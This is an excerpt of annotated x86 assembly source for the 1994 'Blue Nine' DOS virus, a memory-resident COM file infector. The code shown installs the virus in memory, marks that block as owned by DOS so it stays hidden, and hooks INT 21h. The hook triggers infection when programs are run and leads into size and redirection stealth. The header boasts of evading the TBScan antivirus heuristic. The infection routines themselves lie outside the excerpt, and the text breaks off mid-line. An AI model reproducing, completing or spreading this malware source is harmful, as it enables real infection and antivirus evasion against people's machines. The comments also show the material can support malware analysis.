; The Blue Nine virus... (c) 94 Conzouler
; Resident in conventional memory
; Com infection on load and execute
; Com infection on 11/12 (dir for short - TU)
; Size stealth on 11/12
; Size stealth on 4E/4F
; Infection check: seconds=4
; Installation check: get dos version with cx=666
; Redirection stealth on 3D/3F
; No TBScan flags (by hard heuristic as per version 6.26 - TU)
; Assembler setup (MASM/TASM syntax): tiny model, single segment, COM layout with
; the first instruction at offset 100h (the PSP occupies offsets 0-FFh).
.model tiny
.code
org 100h
; Body size in 16-byte paragraphs; the +1 rounds the division up.
; virend is the end-of-body label and lies outside this excerpt.
parasize equ ((offset virend - offset start) / 10h) + 1
bytesize equ parasize*10h ; the same size in bytes (a whole number of paragraphs)
; Entry point of the body. In an infected COM file these six bytes are the first
; thing executed: a near jmp whose displacement the infection code (outside this
; excerpt) is presumed to patch so that it lands on ResCheck wherever the body
; ends up, followed by the host's own first three bytes, which RestoreHost
; writes back over offset 100h before handing control to the host.
Start:
db 0E9h ; Near jmp to ResCheck
dw 03h ; displacement 3: skips the 3 saved host bytes below (100h+3+3 = ResCheck)
HostStartO db 0CDh ; Buffer to save hosthead (host byte 1)
HostStartA dw 09020h ; int20 + nop (host bytes 2-3); with these defaults an unhosted body just terminates
ResCheck:
; Runs inside the host's image (assumes COM entry state: cs=ds=es=PSP).
; Three outcomes: a copy is already resident, or DOS is older than 3.00 ->
; go straight to RestoreHost and run the host; otherwise fall into Install.
; Detection artifact: a genuine DOS answers ah=30h with cx=0; a resident copy
; answers cx=666 with cx=444 (see icheck).
push ax ; the host's entry AX is handed back untouched at RestoreHost
; Perform installation check
mov ah, 30h
mov cx, 666
int 21h ; Dos would set cx to 0
cmp cx, 444 ; but virus will set to 444
je RestoreHost ; if resident
cmp al, 03h ; Don't go resident (al = DOS major version)
jb RestoreHost ; If dosver less than 3.00
Install:
; Code to place virus in memory
; Shrinks the host's own memory block, allocates a fresh block just above it,
; marks that block as owned by DOS, copies the body (from ResCheck onward) into
; it and far-jumps to the copy's InstVec. ds stays the host PSP throughout.
; The CF results of functions 4Ah and 48h are not tested (ax would hold an error
; code on failure and the copy would land at an unintended segment).
mov bx, es ; Dec es to get MCB (assumes es = PSP on entry)
dec bx
mov es, bx
mov bx, es:[3] ; Get size of MB and dec it (MCB word at offset 3 = size in paragraphs)
push cs
pop es ; es = PSP again, the block function 4Ah resizes
sub bx, parasize+2 ; room for parasize+1 paragraphs plus the new block's own MCB
mov ah, 4Ah
int 21h
mov ah, 48h ; Allocate MB to virus
mov bx, parasize+1
int 21h ; ax = segment of the new block
dec ax ; Put MCB in es:0
mov es, ax
mov word ptr es:[1], 08 ; Change owner to system (owner 0008h is what DOS uses for its own allocations, so memory maps attribute the block to DOS)
push word ptr ds:[101h] ; Get delta offset (displacement D of the entry jmp)
pop si
add si, 103h ; Get jmp pos (si = 103h + D = ResCheck inside the host image)
mov di, 16h ; Move virus to new block (MCB is 10h bytes, so this is offset 6 of the block = ResCheck's offset within the body; the first 6 bytes are not copied)
mov cx, bytesize-6
rep movsb ; ds:si -> es:di; assumes DF is clear (no cld in view)
sub ax, 0Fh ; Jmp to new block (ax = MCBseg-0Fh: (MCBseg+1):0 == (MCBseg-0Fh):100h, so the copy's org 100h offsets stay valid)
push ax
mov ax, offset InstVec
push ax
retf ; far jump into the resident copy; es is left pointing at the new MCB
; Chain-to-DOS trampoline: a far jmp whose target is the original INT 21h
; vector, filled in by InstVec (the body patches its own code bytes in place).
; o21 names the offset:segment pair as one far pointer; presumably the dos
; subroutine (outside this excerpt) calls through it.
Org21:
db 0EAh ; Far abs jmp
o21 label
Org21ofs dw ? ; patched with the saved vector offset
Org21seg dw ? ; patched with the saved vector segment
InstVec:
; Code to install virus in vector21
; Executes in the resident copy (cs = new block's segment); ds is still the
; host's PSP and is preserved across this block for RestoreHost, which follows
; by fall-through. Afterwards the INT 21h vector points into a block owned by
; PSP 8 -- the observable footprint of an installed copy.
mov ax, 3521h ; Save org21
int 21h ; es:bx = current INT 21h handler
mov cs:Org21ofs, bx
mov bx, es
mov cs:Org21seg, bx
mov ax, 2125h ; Set Vector21
xchg ah, al ; ax = 2521h; written as 2125h + xchg, presumably so the literal set-vector value never appears in the code (see the header note on scanner flags)
push ds
push cs
pop ds
mov dx, offset Vector21 ; ds:dx = cs:Vector21
int 21h
pop ds ; ds = host PSP again
RestoreHost:
; Reached both from ResCheck (running in the host image) and by fall-through
; from InstVec (running in the resident copy); in both cases ds = host PSP.
; Writes the three saved host bytes back over PSP:100h-102h, restores AX,
; sets es = PSP and far-jumps to PSP:100h, which also makes cs = PSP again.
mov si, ds:[101h] ; Get addr from jmp opc (displacement D)
add si, 100h ; addr to hoststarto (100h + D = ResCheck - 3)
mov ah, ds:[si] ; Restore hosthead
mov ds:[100h], ah
inc si
mov ax, ds:[si]
mov ds:[101h], ax
pop ax ; AX pushed at ResCheck (the Install pushes were consumed by its retf)
push ds ; Set es to host cs
pop es
push ds ; Save host address
mov bx, 100h
push bx
retf ; far jump to PSP:100h
icheck: ; Installation check
; Entered from Vector21 for ah=30h. Only the magic cx=666 is answered here;
; every other version query is chained to DOS through Org21.
cmp cx, 666
jne Org21
mov cx, 444 ; the marker ResCheck tests for
retf 2 ; return to the caller, discarding the flags word pushed by the INT (no iret); the caller resumes with the flags as they stand here, i.e. IF/TF as cleared by the INT entry
Vector21:
; Resident INT 21h handler. Dispatches on the function number in ah; anything
; not of interest chains to the original handler through Org21. Paths ending
; in `retf 2` return straight to the caller: the flags word pushed by the INT
; is discarded, so the caller sees CF as left by the DOS call made via `dos`.
; dos, cominfect, fcbsearch, hdlsearch, hdlopen and hdlread are defined outside
; this excerpt; dos is presumably a far call through o21.
cmp ah, 30h ; Installation check?
jne chn1
jmp icheck
chn1: cmp ax, 4B00h ; Load and execute?
jne chn2
call cominfect ; control then falls through the remaining tests to chnx, so cominfect has to leave the caller's registers intact (not verifiable here)
chn2: cmp ah, 11h ; find first/next (fcb)?
je fff
cmp ah, 12h
jne chn3
fff: call dos ; let DOS perform the FCB search first
cmp al, 0FFh ; al = FFh: no match
je chn3 ; no match falls through every remaining test to chnx, which chains to DOS again -- apparently the same FCB request is issued twice on this path
jmp fcbsearch ; match: size stealth on the result (outside this excerpt)
chn3: cmp ah, 4Eh ; find first handle?
jne chn4
call dos
jnc found
retf 2 ; DOS reported an error: return with its CF
chn4: cmp ah, 4Fh ; find next handle?
jne chn5
call dos
jnc found
retf 2 ; DOS reported an error: return with its CF
found: jmp hdlsearch ; size stealth on the found entry (outside this excerpt)
chn5: cmp ah, 3Dh ; open handle?
jne chn6
call dos
jnc opened
retf 2 ; DOS reported an error: return with its CF
opened: jmp hdlopen ; redirection stealth on the open handle (outside this excerpt)
chn6: cmp ah, 3Fh ; read from handle
jne chnx
jmp hdlread ; redirection stealth on reads (outside this excerpt)
chnx: jmp Org21 ; Chain to dos
db '